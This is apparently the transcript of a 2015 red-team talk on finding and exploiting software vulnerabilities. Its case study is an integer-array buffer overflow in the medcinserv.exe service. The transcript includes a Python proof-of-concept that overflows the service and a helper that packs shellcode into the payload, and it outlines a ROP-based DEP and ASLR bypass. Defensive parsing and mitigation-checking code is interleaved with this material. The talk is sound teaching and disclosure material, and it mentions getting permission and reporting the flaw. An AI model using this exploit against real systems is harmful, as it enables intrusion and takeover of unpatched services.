software vulnerability discovery and exploitation during red team assessments
TRANSCRIPT
Software Vulnerability Discovery & Exploitation During Red Team Assessments
Ryan Wincey
9/30/2015
Background
• Long term red team assessments
• Persistence with remote access tools
• Looking for alternative means of network propagation or privilege escalation
Identify Targets
• Look for applications that are listening on sockets or running at a higher privilege level
• Windows
– netstat -ano | findstr LISTEN
– tasklist /v | findstr <pid>
• Linux
– netstat -anop | grep LISTEN
– ps -ef | grep <pid>
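The same two Linux commands give a defender an inventory of privileged, network-reachable services to review first. The script below is an added example, not part of the original slides; the sample command output and the process names in it are constructed.

```python
# Constructed sample output of the two Linux commands above (not from the slides).
NETSTAT = """\
tcp   0  0 0.0.0.0:22      0.0.0.0:*      LISTEN      812/sshd        off (0.00/0/0)
tcp   0  0 127.0.0.1:5432  0.0.0.0:*      LISTEN      950/postgres    off (0.00/0/0)
tcp   0  0 0.0.0.0:8443    0.0.0.0:*      LISTEN      1377/vendor_svc off (0.00/0/0)
tcp   0  0 10.0.0.5:22     10.0.0.9:5122  ESTABLISHED 2001/sshd       keepalive (1.0/0/0)
tcp6  0  0 :::8080         :::*           LISTEN      1420/java       off (0.00/0/0)
"""
PS_EF = """\
UID        PID  PPID  C STIME TTY      TIME     CMD
root       812     1  0 09:00 ?        00:00:00 /usr/sbin/sshd -D
postgres   950     1  0 09:00 ?        00:00:01 /usr/lib/postgresql/bin/postgres
root      1377     1  0 09:01 ?        00:00:04 /opt/vendor/bin/vendor_svc --port 8443
appuser   1420     1  0 09:01 ?        00:00:09 java -jar /srv/app.jar
"""
LOOPBACK = ("127.", "::1")

def parse_listeners(netstat_text):
    """Return (pid, address, port) for every TCP socket in LISTEN state."""
    listeners = []
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) < 7 or not f[0].startswith("tcp") or f[5] != "LISTEN":
            continue
        addr, _, port = f[3].rpartition(":")
        pid = f[6].split("/", 1)[0]      # "-" when netstat ran without root
        if pid.isdigit():
            listeners.append((int(pid), addr, int(port)))
    return listeners

def parse_owners(ps_text):
    """Map PID -> (user, command line) from `ps -ef` output."""
    owners = {}
    for line in ps_text.splitlines()[1:]:
        f = line.split(None, 7)
        if len(f) == 8 and f[1].isdigit():
            owners[int(f[1])] = (f[0], f[7])
    return owners

def privileged_exposed(netstat_text, ps_text, privileged=("root",)):
    """Listeners owned by a privileged account and reachable off-host."""
    owners = parse_owners(ps_text)
    findings = []
    for pid, addr, port in parse_listeners(netstat_text):
        user, cmd = owners.get(pid, ("?", "?"))
        if user in privileged and not addr.startswith(LOOPBACK):
            findings.append((port, pid, user, cmd))
    return sorted(findings)
```

Calling `privileged_exposed(NETSTAT, PS_EF)` on the constructed data returns the two root-owned services bound to all interfaces and skips the loopback-only and unprivileged listeners.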
Static Analysis
• Reverse Engineering Software
– IDA Pro/HexRays
– Hopper
– Other
• Target Binary
• Helpful bug hunting tips
– Identify areas where data is introduced from outside of the application
  • Command Line Parameters
  • Socket Reads
  • File Reads
  • Environment Variables
  • e.g. read, gets, fread, fgets, recv, recvfrom
– Trace those inputs to parsing functions; look for interesting functions and memory operations
  • strcpy, strcat
  • sprintf, printf
  • memcpy
  • system
  • any custom string or memory copies
Dynamic Analysis Checklist
• In order to perform dynamic analysis, we will need to ensure that the application will run in our test environment.
• Tips for getting the application to run.
– Zip up support files in the same directory. (7za, zip)
– Listdlls.exe, ldd - loaded libraries
– Handle.exe, /proc/<pid> - open files
– Procmon.exe - identify registry keys
– Read log files - track down missing files or registry settings
Analyzing Process Memory
• Comparing the running process environment to your test environment.
• Windows: procdump.exe /accepteula -ma <pid> <dump file>
• Linux: gdb attach <pid>
Crash Dumps
• In the event that you crash the application and want to collect crash dumps.
• Windows: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps
– DumpFolder
– DumpCount
– DumpType
– CustomDumpFlags
• Linux: ulimit -c unlimited
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Identify target and binary location
• Static analysis using IDA Pro and HexRays decompiler.
• Locate additional dependencies
• Query service details in registry
• Set up a nearly identical environment
– Operating system
– File system
– Service registration
– Debugging tools
– Scripting support
• Set breakpoint on our vulnerable function
• POC Skeleton
– Define Protocol
  [ Message Type : 2 bytes ][ Data Length : 4 bytes ][ Data ]
– Choose Implementation
  Python, Ruby, PowerShell, C
– Code up boilerplate stuff / use template
  Socket connect, send, recv, formatting
import socket
import struct
import sys

def send(msg_type, pack_len, data=None):
    if pack_len < 6 or pack_len > 0x3d090:
        print("Length must be between 6 and 0x3d090 bytes.")

    # Set the type
    buf = struct.pack('>h', msg_type)

    # Send length, must be less than 0x3d090, can be negative
    buf += struct.pack('>i', pack_len)

    # Send data
    if pack_len > 0:
        buf += data
    try:
        # Send data
        csock.send(buf)
    except socket.error:
        pass

if len(sys.argv) == 3:
    (progname, host, port) = sys.argv
else:
    print('Usage: {0} host port'.format(sys.argv[0]))
    exit(1)

csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect((host, int(port)))
csock.settimeout(1)
print("[+] connected to server.")

# Try things
i = 238
data = b"1," * 1000

print("[+] sending data.")
send(i, len(data) + 6, data)

csock.close()
print("[+] goodbye")
Integer Array
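Seen from the server side, the frame layout defined above and the integer-array payload call for three checks: an unsigned, bounded length field; a length that matches the bytes received; and an entry count no larger than the destination array. The parser below is an added example, not code from the slides or from the vendor. `MAX_ENTRIES` is a hypothetical array capacity, and treating the length field as including the 6-byte header is an assumption taken from the `len(data) + 6` call in the skeleton.

```python
import struct

HEADER = struct.Struct(">HI")    # type: 2 bytes, length: 4 bytes, read as unsigned
MIN_LEN, MAX_LEN = 6, 0x3d090    # bounds quoted in the slide's send() helper
MAX_ENTRIES = 64                 # assumed capacity of the destination integer array

class FrameError(ValueError):
    """Raised for any frame the server should drop."""

def parse_frame(buf):
    """Validate one complete frame; the length field counts the 6-byte header."""
    if len(buf) < HEADER.size:
        raise FrameError("short header")
    msg_type, length = HEADER.unpack_from(buf)
    # Read unsigned, a negative length becomes a huge value and fails here.
    if not MIN_LEN <= length <= MAX_LEN:
        raise FrameError("length out of range")
    if length != len(buf):
        raise FrameError("length does not match bytes received")
    return msg_type, bytes(buf[HEADER.size:])

def parse_int_array(payload, max_entries=MAX_ENTRIES):
    """Decode "n,n,n," into 32-bit values, refusing more than the array holds."""
    fields = payload.rstrip(b",").split(b",") if payload else []
    if len(fields) > max_entries:          # the bounds check the overflow needs
        raise FrameError("too many entries")
    values = []
    for field in fields:
        if not field.isdigit() or len(field) > 10 or int(field) > 0xFFFFFFFF:
            raise FrameError("bad entry")
        values.append(int(field))
    return values

def handle(buf):    # -> ("ok", type, values) or ("reject", reason)
    try:
        msg_type, payload = parse_frame(buf)
        return ("ok", msg_type, parse_int_array(payload))
    except FrameError as exc:
        return ("reject", str(exc))

def frame(msg_type, payload, length=None):
    """Constructed test frames; length=None means the honest value."""
    length = len(payload) + HEADER.size if length is None else length
    return struct.pack(">hi", msg_type, length) + payload

if __name__ == "__main__":
    print(handle(frame(238, b"1,2,3,")))
    print(handle(frame(238, b"1," * 1000)))
    print(handle(frame(238, b"1,", length=-1)))
```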
• We own EIP
• Our target environment, Windows 7 SP1, has DEP, ASLR, and SafeSEH on all OS libraries.
• Medcinserv.exe doesn’t have any built-in protections.
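Whether a binary has opted in to ASLR and DEP is recorded in the DllCharacteristics field of its PE optional header, so a defender can audit installed third-party executables for the gap described above. The checker below is an added example, not part of the original slides; `build_sample` constructs a minimal header for the demonstration, and SafeSEH, which is stored in the load configuration directory, is outside its scope.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
DYNAMIC_BASE = 0x0040    # image may be relocated at load time (ASLR)
NX_COMPAT = 0x0100       # image is compatible with DEP
NO_SEH = 0x0400          # image contains no SEH handlers

def dll_characteristics(image):
    """Return the DllCharacteristics word of a PE32 or PE32+ image."""
    try:
        if image[:2] != b"MZ":
            raise ValueError("not an MZ image")
        (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
        if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            raise ValueError("missing PE signature")
        opt = e_lfanew + 4 + 20          # optional header follows the COFF header
        (magic,) = struct.unpack_from("<H", image, opt)
        if magic not in (0x10B, 0x20B):  # PE32 / PE32+
            raise ValueError("unknown optional header magic")
        # DllCharacteristics sits at offset 70 in both header layouts.
        return struct.unpack_from("<H", image, opt + 70)[0]
    except struct.error:
        raise ValueError("truncated image")

def mitigation_report(image):
    flags = dll_characteristics(image)
    # SafeSEH lives in the load configuration directory and is not checked here.
    return {"aslr": bool(flags & DYNAMIC_BASE),
            "dep": bool(flags & NX_COMPAT),
            "no_seh": bool(flags & NO_SEH)}

def build_sample(flags):
    """Constructed minimal PE32 headers carrying the given flag word."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<H", opt, 70, flags)
    return dos + b"PE\0\0" + coff + bytes(opt)

if __name__ == "__main__":
    print("no opt-in:", mitigation_report(build_sample(0)))
    print("hardened: ", mitigation_report(build_sample(DYNAMIC_BASE | NX_COMPAT)))
```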
• Bypass DEP by changing the execution permissions of the stack dynamically.
• Change permissions using ROP chain composed of gadgets from the medcinserv binary.
• Bypass ASLR because ROP gadgets in medcinserv binary are static.
• NULL bytes are allowed since it’s an integer array buffer overflow.
• ROP gadgets generated for VirtualAlloc
• Resolve VirtualAlloc using GetModuleHandle and GetProcAddress
• Exploit Design Structure
• Shellcode to String Array Function
def add_shellcode(sc):
    global data

    # Determine the iterator
    shellcode_len = len(sc)
    iterator = shellcode_len // 4
    if shellcode_len % 4 > 0:
        iterator += 1

    counter = 0
    for i in range(int(iterator)):
        entry = sc[(i*4):(i*4)+4]

        # Make sure length is four bytes
        len_entry = len(entry)
        if len(entry) < 4:
            entry += b"\x90" * (4 - len_entry)
        data += str(struct.unpack("<I", entry)[0]).encode() + b","

        counter += 1

    return counter
DEMO
Test Exploit
• Test in as nearly identical an environment as possible
• Non-critical systems, preferably when users are away
• Make sure to get permission
• Get more shellz
Reporting
• US CERT
• MITRE
• NIST
QUESTIONS?